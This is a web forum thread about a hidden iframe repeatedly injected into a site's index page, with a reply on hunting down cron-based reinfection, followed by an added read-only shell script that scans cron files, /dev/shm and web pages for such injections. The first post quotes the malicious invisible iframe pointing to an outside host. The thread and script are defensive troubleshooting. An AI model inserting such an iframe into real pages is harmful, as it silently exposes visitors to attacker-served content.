Thread: code injection

  1. #1
    dizyn (SitePoint Zealot)

    code injection

    Somehow the following code gets injected into my index page. What should I do to stop it?


    <iframe src="http://u3w.ru:8080/index.php" width=123 height=130 style="visibility: hidden"></iframe>
    I have 4 subdomains and the problem is on the index page only; the rest of it is fine.

    Thanks

  2. #2
    lampcms.com (PHP Guru)

    Ask your admin to check cron entries. Usually a virus-like program creates a cron entry to check every 'n' minutes or hours, and if it notices that you have removed that iframe from your page it will add it again. The contents (HTML to add) are usually hidden in some writable directory, often on the /dev/shm partition - the place where you would not expect to have any files or programs, but since /dev/shm is (must be) writable, a virus often uses it to store contents.

    But your first step should be to examine all cron entries. Look in /etc/cron.daily and in /etc/cron.d
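
The checks suggested in the reply above, written as read-only shell functions. This is an added example, not code from the thread: the function names, the cron locations beyond /etc/cron.d and /etc/cron.daily, and the /tmp and /var/tmp patterns are assumptions.

```shell
#!/bin/sh
# Added example (not from the thread). Each function takes an optional ROOT so
# it can run against the live system (empty ROOT) or a mounted disk image.

# Cron locations, relative to ROOT. The reply names cron.d and cron.daily; the
# others are assumed additions: further places cron reads jobs from on Linux.
CRON_PATHS="etc/crontab etc/cron.d etc/cron.hourly etc/cron.daily
etc/cron.weekly etc/cron.monthly var/spool/cron"

# Print file:line:text for each non-comment cron line that references a
# world-writable directory (/dev/shm from the reply; /tmp, /var/tmp assumed).
cron_refs_to_writable() {
    root="${1:-}"
    for rel in $CRON_PATHS; do
        [ -e "$root/$rel" ] || continue
        grep -rHnE '/dev/shm|/var/tmp|/tmp/' "$root/$rel" 2>/dev/null |
            grep -vE '^[^:]+:[0-9]+:[[:space:]]*#' || true
    done
}

# List regular files under /dev/shm with mode, owner and mtime, so anything
# that is not an application's shared-memory segment stands out.
shm_files() {
    root="${1:-}"
    [ -d "$root/dev/shm" ] || return 0
    find "$root/dev/shm" -type f -exec ls -l {} + 2>/dev/null || true
}

# List files under a web root that contain an iframe styled as hidden,
# the shape of the injected tag quoted in the first post.
hidden_iframes() {
    grep -rliE '<iframe[^>]*visibility:[[:space:]]*hidden' "$1" 2>/dev/null || true
}
```

Source the file as root and call `cron_refs_to_writable`, `shm_files` and `hidden_iframes /path/to/webroot`; nothing is modified, so the output can be saved as evidence before any cleanup.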

